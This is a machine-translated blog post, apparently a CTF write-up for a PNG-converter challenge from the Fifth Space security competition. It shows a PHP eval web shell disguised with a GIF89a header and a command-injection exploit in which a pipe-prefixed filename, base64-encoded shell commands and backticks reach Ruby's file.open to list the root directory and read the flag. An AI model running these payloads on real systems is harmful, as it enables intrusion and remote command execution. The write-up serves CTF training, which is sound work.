当前位置:网站首页>Intelligent security of the fifth space ⼤ real competition problem ----------- PNG diagram ⽚ converter
Intelligent security of the fifth space ⼤ real competition problem ----------- PNG diagram ⽚ converter
2022-07-29 05:52:00 【EdmunDJK】
Fifth, space intelligent security ⼤ The real title of the competition ----------PNG chart ⽚ converter
The problem solving steps :
Don't talk much , See the attachment of the title , Lower him , Use Notepad to open and find the source code of the web page , The same as usual , To examine !
After the code audit, we can see , File pair … / Sign into ⾏ Filtered , So we can't upload directly
stay convert Can be found in file.open Loopholes can benefit ⽤.
First of all, let's understand the meaning of this sentence upload file /png Format , return base64 Encrypted file name
"var img = document.createElement(\"img\");\nimg.src= \"data:image/png;base64," + Base64.encode64(res).gsub(/\s*/, '') + "\";\n"
Let's upload one at will .png file , The content is one sentence , In case of success ?
GIF89a
<?php phpinfo(); @eval($_POST['123']); ?>
Click on upload Show upload success
We can see that the file name has been modified , Next, let's convert the contents of the file , Click on convert
Enter the file name modified above , Click on submit
It is not difficult to find that the contents of our documents have been base64 It's encrypted
Then we can't upload a sentence directly to the Trojan horse , But now that it has read the file , Even though we did base64 encryption , We can also directly put us shell Just put the command in and decrypt it
But the above has been filtered through code audit … / Symbol , So here we use `` The quotes and || Pipe symbol to do what we want , Here we first introduce the functions of backquotes and pipe characters
The quotation marks :
You can also use shell Special characters for .Shell To get the result of the command in backquotes , It actually executes the command specified in the backquote . Execution time , Special characters in commands , Such as $,”,? And so on will have special meanings , And what the backquotes contain can be any legal Shell command
$ ls
note readme.txt Notice Unix.dir
$ TestString="`echo $HOME ` ` ls [nN]*`"
$ echo $TestString
/home/yxz note Notice
Reference link :https://blog.csdn.net/weixin_40240670/article/details/86694724
Pipe, :
The output of one command can be used as the input of another through the pipeline .
“|” Is the pipeline command operator , Abbreviation: pipe symbol . utilize Linux The supplied pipeline symbol “|” Separate the two commands , The output of the command to the left of the pipe will be used as the input to the command on the right of the pipe . Continuous use of pipes means that the output of the first command will be as The input of the second command , The output of the second command is used as the input of the third command , And so on
Use bp Grab the bag , Use the file name just uploaded , Click on sumbit
We can see the transformation diagram below ⽚ My bag , To repeater
So let's start here , The source file uses base64 encryption , Then let's use the back quotation marks inside the back quotation marks shell Command execution , Then use the pipe symbol to decrypt the converted file
Here we use ls / To view the files in its root directory , To carry out an order base64 encryption , Add base64 Decryption instructions , take shell Command output to the uploaded image file .
Report errors , Re examination found that there was one less pipe symbol ...... again send
file=|`echo bHMgLw== | base64 -d`>4755211f043684058811cb50d9ddb4df.png
render There seems to be nothing in it , Enter the page to see
See a string of base64 Encrypted content , Explain ! Use hackbar
Choose base64 decode, Decrypt the above content to see its root directory , There is one flag_9707 file
Now that I know flag Location , Then let's go directly cat Command input , Old method , Yes cat /flag_9707 Conduct base64 encryption , Add base64 Decryption instructions , take shell Command output flag Content to the uploaded image file
file=|`echo Y2F0IC9mbGFnXzk3MDc= | base64 -d`>4755211f043684058811cb50d9ddb4df.png
Click on send No report error , Enter the page to view
Decrypt the following content to get flag
ctfhub{4d99ffb30443051a909a2e0d}
There are many deficiencies in the article , Please spray gently ....
边栏推荐
- Okaleido Tiger 7.27日登录Binance NFT,首轮已获不俗成绩
- “山东大学移动互联网开发技术教学网站建设”项目实训日志七
- Training log 7 of the project "construction of Shandong University mobile Internet development technology teaching website"
- datax安装
- Move protocol global health declaration, carry out the health campaign to the end
- Huawei 2020 school recruitment written test programming questions read this article is enough (Part 1)
- 与张小姐的春夏秋冬(4)
- DAY4:SQL Sever 简单使用
- Fantom (FTM) surged 45% before the FOMC meeting
- 与张小姐的春夏秋冬(5)
猜你喜欢
Huawei 2020 school recruitment written test programming questions read this article is enough (Part 1)
Fantom (FTM) prices will soar by 20% in the next few days
麦当娜“Hellbent”购买130万美元的nft无聊猿,现在被认为太贵了
如何零代码制作深度学习的趣味app(适合新手)
新手入门:手把手从PHP环境到ThinkPHP6框架下载
Idea using JDBC to connect mysql database personal detailed tutorial
微信内置浏览器禁止缓存的问题
iSCSI vs iSER vs NVMe-TCP vs NVMe-RDMA
Laravel service container (inheritance and events)
重庆大道云行作为软件产业代表受邀参加渝中区重点项目签约仪式
随机推荐
Under the bear market of encrypted assets, platofarm's strategy can still obtain stable income
Sliding switch of tab of uniapp component
Bare metal cloud FASS high performance elastic block storage solution
Flink connector Oracle CDC 实时同步数据到MySQL(Oracle19c)
Huawei 2020 school recruitment written test programming questions read this article is enough (Part 1)
How to make interesting apps for deep learning with zero code (suitable for novices)
Laravel服务容器(上下文绑定的运用)
焕然一新,swagger UI 主题更改
datax安装
量化开发必掌握的30个知识点【什么是Level-2数据】
ssm整合
NIFI 改UTC时间为CST时间
MOVE PROTOCOL全球健康宣言,将健康运动进行到底
Study and research the way of programming
CMD window under Windows connects to MySQL and operates the table
Go|gin quickly use swagger
"Shandong University mobile Internet development technology teaching website construction" project training log V
Performance comparison | FASS iSCSI vs nvme/tcp
MySQL decompressed version windows installation
Go|Gin 快速使用Swagger